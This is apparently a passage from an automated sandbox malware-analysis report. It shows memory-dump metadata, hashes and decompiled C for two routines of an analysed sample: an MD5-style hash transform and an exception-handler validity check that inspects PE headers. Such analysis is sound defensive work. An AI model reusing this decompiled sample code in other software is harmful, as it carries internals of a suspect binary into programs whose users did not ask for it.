                                                            • Instruction Fuzzy Hash: ADE0BF7260021AABCF025EE4ED08D9E7F6DFF48751B005424FE06E6121DB39E965BFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045788BB, Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04578C93
                                                            • memset.NTDLL ref: 04578CA2
                                                              • Part of subcall function 0457E69A: memset.NTDLL ref: 0457E6AB
                                                              • Part of subcall function 0457E69A: memset.NTDLL ref: 0457E6B7
                                                              • Part of subcall function 0457E69A: memset.NTDLL ref: 0457E6E2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 28c74602a4c6d3f8fefc06176283aa78a9c3ed14a8b51ac47bef43b2591b45ce
                                                            • Instruction ID: eb530b3c545b89c166b4a1063e94a4cb52e579a7f5a5bdea95a29681f0735a87
                                                            • Opcode Fuzzy Hash: 28c74602a4c6d3f8fefc06176283aa78a9c3ed14a8b51ac47bef43b2591b45ce
                                                            • Instruction Fuzzy Hash: 3C021070501B218FC775DE29E688566BBF1BF547207604E2ED6EB8AA90E231F885DB04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04572499, Relevance: 1.9, APIs: 1, Instructions: 610COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 523c6934fa8619eb58fe062c8478ee53148621b1613d96d5b6d6cc4fc8df6de0
                                                            • Instruction ID: 44f596211e6f4ea021b3adb05468a415d93858d1b6ee3fdb104eec78ef85eb13
                                                            • Opcode Fuzzy Hash: 523c6934fa8619eb58fe062c8478ee53148621b1613d96d5b6d6cc4fc8df6de0
                                                            • Instruction Fuzzy Hash: BB22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4FA7, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E00DD4FA7(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                                            0x00dd4faa
                                                            0x00dd4fb5
                                                            0x00dd4fb8
                                                            0x00dd4fbb
                                                            0x00dd4fbc
                                                            0x00dd4fbc
                                                            0x00dd4fc7
                                                            0x00dd4fd8
                                                            0x00dd4fda
                                                            0x00dd4fdd
                                                            0x00dd4fdd
                                                            0x00dd4fe0
                                                            0x00dd4fe0
                                                            0x00dd4fe3
                                                            0x00dd4fe3
                                                            0x00dd4fe6
                                                            0x00dd4fe6
                                                            0x00dd5003
                                                            0x00dd5006
                                                            0x00dd501c
                                                            0x00dd501f
                                                            0x00dd5039
                                                            0x00dd503c
                                                            0x00dd5052
                                                            0x00dd5055
                                                            0x00dd5057
                                                            0x00dd506f
                                                            0x00dd5072
                                                            0x00dd5075
                                                            0x00dd508d
                                                            0x00dd5090
                                                            0x00dd50aa
                                                            0x00dd50ad
                                                            0x00dd50c3
                                                            0x00dd50c6
                                                            0x00dd50c8
                                                            0x00dd50e0
                                                            0x00dd50e5
                                                            0x00dd50e8
                                                            0x00dd50fe
                                                            0x00dd5101
                                                            0x00dd511b
                                                            0x00dd511e
                                                            0x00dd5134
                                                            0x00dd5137
                                                            0x00dd5139
                                                            0x00dd5154
                                                            0x00dd5157
                                                            0x00dd516e
                                                            0x00dd5171
                                                            0x00dd5175
                                                            0x00dd518e
                                                            0x00dd5191
                                                            0x00dd5193
                                                            0x00dd5196
                                                            0x00dd51b1
                                                            0x00dd51b4
                                                            0x00dd51cd
                                                            0x00dd51d0
                                                            0x00dd51e0
                                                            0x00dd51e3
                                                            0x00dd51fb
                                                            0x00dd51fe
                                                            0x00dd5218
                                                            0x00dd521b
                                                            0x00dd5233
                                                            0x00dd5236
                                                            0x00dd524c
                                                            0x00dd524f
                                                            0x00dd5267
                                                            0x00dd526a
                                                            0x00dd5282
                                                            0x00dd5285
                                                            0x00dd529f
                                                            0x00dd52a2
                                                            0x00dd52b8
                                                            0x00dd52bb
                                                            0x00dd52d3
                                                            0x00dd52d6
                                                            0x00dd52f0
                                                            0x00dd52f3
                                                            0x00dd530b
                                                            0x00dd530e
                                                            0x00dd5324
                                                            0x00dd5327
                                                            0x00dd533f
                                                            0x00dd5342
                                                            0x00dd535a
                                                            0x00dd535d
                                                            0x00dd536f
                                                            0x00dd5372
                                                            0x00dd5384
                                                            0x00dd5387
                                                            0x00dd5399
                                                            0x00dd539c
                                                            0x00dd53a0
                                                            0x00dd53b0
                                                            0x00dd53b3
                                                            0x00dd53c1
                                                            0x00dd53c4
                                                            0x00dd53d6
                                                            0x00dd53d9
                                                            0x00dd53ed
                                                            0x00dd53f0
                                                            0x00dd53f2
                                                            0x00dd5402
                                                            0x00dd5405
                                                            0x00dd5417
                                                            0x00dd541a
                                                            0x00dd5428
                                                            0x00dd542b
                                                            0x00dd543d
                                                            0x00dd5440
                                                            0x00dd5444
                                                            0x00dd5454
                                                            0x00dd5457
                                                            0x00dd5469
                                                            0x00dd546c
                                                            0x00dd547a
                                                            0x00dd547d
                                                            0x00dd548f
                                                            0x00dd5492
                                                            0x00dd54a4
                                                            0x00dd54a7
                                                            0x00dd54bb
                                                            0x00dd54be
                                                            0x00dd54d2
                                                            0x00dd54d5
                                                            0x00dd54e9
                                                            0x00dd54ec
                                                            0x00dd5500
                                                            0x00dd5503
                                                            0x00dd5517
                                                            0x00dd551a
                                                            0x00dd552e
                                                            0x00dd5533
                                                            0x00dd5545
                                                            0x00dd5548
                                                            0x00dd555c
                                                            0x00dd555f
                                                            0x00dd5573
                                                            0x00dd5576
                                                            0x00dd558c
                                                            0x00dd558f
                                                            0x00dd55a3
                                                            0x00dd55a6
                                                            0x00dd55b8
                                                            0x00dd55bb
                                                            0x00dd55cf
                                                            0x00dd55d2
                                                            0x00dd55e6
                                                            0x00dd55e9
                                                            0x00dd55fd
                                                            0x00dd5606
                                                            0x00dd5609
                                                            0x00dd5612
                                                            0x00dd561b
                                                            0x00dd5623
                                                            0x00dd562b
                                                            0x00dd5635
                                                            0x00dd564a

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                                            • Instruction ID: 1e9214db6661724b81712010c077b3e11c760bc6eb13d00249c37af32882b6d1
                                                            • Opcode Fuzzy Hash: fd7bc766d4c076c0fc6ef6b18f36817df6ffc8674d59026e291d3086fa030388
                                                            • Instruction Fuzzy Hash: 7022847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04564AFE, Relevance: 1.8, APIs: 1, Instructions: 556COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,?,00000000,000000FE), ref: 04564EBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 701952b79a3eb0b7148b648e4870310f968767c9de0b6ca87eede3e28cc8a546
                                                            • Instruction ID: 8fcc9539ab8e3194b9f907983bab8a56809d208be1024abcb4b5d4f084a114f5
                                                            • Opcode Fuzzy Hash: 701952b79a3eb0b7148b648e4870310f968767c9de0b6ca87eede3e28cc8a546
                                                            • Instruction Fuzzy Hash: 20327B70A00209EFDF14CF58D5807AEBBF1FF85311F1485AAD856AB285E774EA41EB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD8055, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD8055(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xdda330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xdda378 = 1;
										__eflags =  *0xdda378;
										if( *0xdda378 != 0) {
											goto L60;
										}
										_t84 =  *0xdda330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xdda378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xdda330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xdda338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xdda334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xdda338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xdda338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xdda378 = 1;
							__eflags =  *0xdda378;
							if( *0xdda378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xdda338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xdda338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xdda378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xdda338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xdda330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xdda338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xdda338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                            0x00dd805f
                                                            0x00dd8062
                                                            0x00dd8068
                                                            0x00dd8086
                                                            0x00000000
                                                            0x00dd8086
                                                            0x00dd8070
                                                            0x00dd8079
                                                            0x00dd807f
                                                            0x00dd808e
                                                            0x00dd8091
                                                            0x00dd8094
                                                            0x00dd809e
                                                            0x00dd809e
                                                            0x00dd80a0
                                                            0x00dd80a3
                                                            0x00dd80a5
                                                            0x00dd80a5
                                                            0x00dd80a7
                                                            0x00dd80aa
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd80ac
                                                            0x00dd80ae
                                                            0x00dd8114
                                                            0x00dd8114
                                                            0x00dd8272
                                                            0x00000000
                                                            0x00dd8272
                                                            0x00dd80b0
                                                            0x00dd80b0
                                                            0x00dd80b4
                                                            0x00dd80b6
                                                            0x00dd80b6
                                                            0x00dd80b6
                                                            0x00dd80b6
                                                            0x00dd80b9
                                                            0x00dd80ba
                                                            0x00dd80bd
                                                            0x00dd80bd
                                                            0x00dd80c1
                                                            0x00dd80c5
                                                            0x00dd80d3
                                                            0x00dd80d3
                                                            0x00dd80db
                                                            0x00dd80e1
                                                            0x00dd80e3
                                                            0x00dd80e5
                                                            0x00dd80f5
                                                            0x00dd8102
                                                            0x00dd8106
                                                            0x00dd810b
                                                            0x00dd810d
                                                            0x00dd818b
                                                            0x00dd818b
                                                            0x00dd810f
                                                            0x00dd810f
                                                            0x00dd810f
                                                            0x00dd818d
                                                            0x00dd818f
                                                            0x00dd8270
                                                            0x00dd8270
                                                            0x00000000
                                                            0x00dd8195
                                                            0x00dd8195
                                                            0x00dd819c
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd81a2
                                                            0x00dd81a6
                                                            0x00dd8202
                                                            0x00dd8204
                                                            0x00dd820c
                                                            0x00dd820e
                                                            0x00dd8210
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd8212
                                                            0x00dd8218
                                                            0x00dd821a
                                                            0x00dd821c
                                                            0x00dd8231
                                                            0x00dd8231
                                                            0x00dd8233
                                                            0x00dd8262
                                                            0x00dd8269
                                                            0x00000000
                                                            0x00dd8269
                                                            0x00dd8237
                                                            0x00dd8238
                                                            0x00dd823a
                                                            0x00dd823c
                                                            0x00dd823c
                                                            0x00dd823e
                                                            0x00dd8240
                                                            0x00dd8242
                                                            0x00dd8256
                                                            0x00dd8256
                                                            0x00dd8259
                                                            0x00dd825b
